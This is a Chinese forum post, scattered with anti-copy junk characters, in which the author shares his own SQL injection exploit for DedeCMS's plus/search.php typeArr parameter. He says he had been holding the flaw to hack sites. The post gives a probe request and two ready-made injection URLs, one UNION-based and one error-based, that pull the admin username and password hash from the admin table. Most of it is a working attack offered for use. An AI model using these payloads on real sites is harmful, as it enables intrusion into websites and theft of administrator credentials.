转载不加作者名的没JJ: {2 T/ g3 p# _7 C4 d7 q" ?
: p' a5 d. f& P) E哎。没意识,我一个月前就发现了这个漏洞,一直也没去黑站 放那 现在狗卵的什么 知道创宇 发出来了。郁闷。。可惜了我的洞辛苦看了2天的dedecms漏洞就这样没了。- o* c, X. ?" P2 p: L+ o- p
$ m/ |1 R$ ~# X; |+ M- p. ~
既然已经发出来了,我就把我自己搞的exp发下吧。。唉。
5 }4 n# l7 W* j9 ]0 e8 n0 }- F K2 y' C% P' X Z' B$ V
我一般是这样测试的:+ v6 }+ L; i4 N3 s
+ [4 k7 c1 u/ M, ?5 s. k' @ r& l
提交 xx.com/plus/search.php?keyword=as&typeArr[ uNion ]=a
( R. t6 ^, q# i ?% a+ ?+ o
! }: y' v$ V9 G4 Z& |6 O+ u转载不加作者名的没JJ
) q5 B: H9 a: K* p* A/ j. M
0 E. S' i3 P2 |( N* B6 g作者:鬼哥5 h/ W) T5 j9 J7 b
& b+ \8 x8 d3 p7 q! Q! J2 v
, K" V% N- R# n/ v" M( C- i
" \$ r* c: F. a- s9 r
看结果如果提示
1 N/ ~; B4 C8 t
8 f. C: N A4 q3 S3 \3 D# ]Safe Alert: Request Error step 2 !2 h" {! h/ P& ], d. K) h5 V
' l( F! K. k) ~$ X' J! r
那么直接用下面的exp6 k$ A- ~ m% E- T
9 B# ~# N! p+ j/ B8 s8 M
xx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\'`+]=a
3 ]/ Q6 ?4 ^* s" A' o% H1 I% `; f u/ n
( j# `* u3 Y _* h8 r* l. U
看结果如果提示
$ B% E/ v P5 L3 h6 N: f* ^/ i( F w- j
Safe Alert: Request Error step 1 !# }7 v+ \! [& r$ R! m8 J' V
. {: y: `9 U+ |那么直接用下面的exp% L' a$ _5 c' g
% w7 V6 e& m& m6 L, \7 Qxx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\'`+]=a
7 Z+ T& {6 u- C3 p, z( b
+ `+ I% t0 A+ t) d. ^
, W/ g. x7 a8 f4 v如果正常显示证明漏洞不存在了。8 ~% Z# I$ E# H
+ H- G& L. z! f转载不加作者名的没JJ |